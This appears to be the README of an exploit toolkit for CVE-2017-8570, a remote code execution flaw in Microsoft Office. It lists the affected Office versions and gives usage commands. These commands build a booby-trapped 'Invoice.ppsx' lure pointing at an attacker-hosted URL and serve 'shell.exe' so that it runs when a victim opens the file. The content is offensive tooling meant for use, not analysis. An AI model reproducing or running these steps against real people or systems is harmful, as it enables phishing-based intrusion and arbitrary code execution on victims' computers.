CVE-2017-8570

Description

Script Moniker remote code execution vulnerability

Affected versions

  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2 (32-bit editions)
  • Microsoft Office 2010 Service Pack 2 (64-bit editions)
  • Microsoft Office 2013 RT Service Pack 1
  • Microsoft Office 2013 Service Pack 1 (32-bit editions)
  • Microsoft Office 2013 Service Pack 1 (64-bit editions)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2016 (64-bit edition)

Usage

Create the malicious document

# python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.154.200/logo.doc
Generated Invoice.ppsx successfully

Start the HTTP server, listening on the specified port

python cve-2017-8570_toolkit.py -M exp -e http://192.168.154.200/shell.exe -l /tmp/shell.exe

When the victim opens Invoice.ppsx, shell.exe is executed, but a CMD window flashes briefly.

References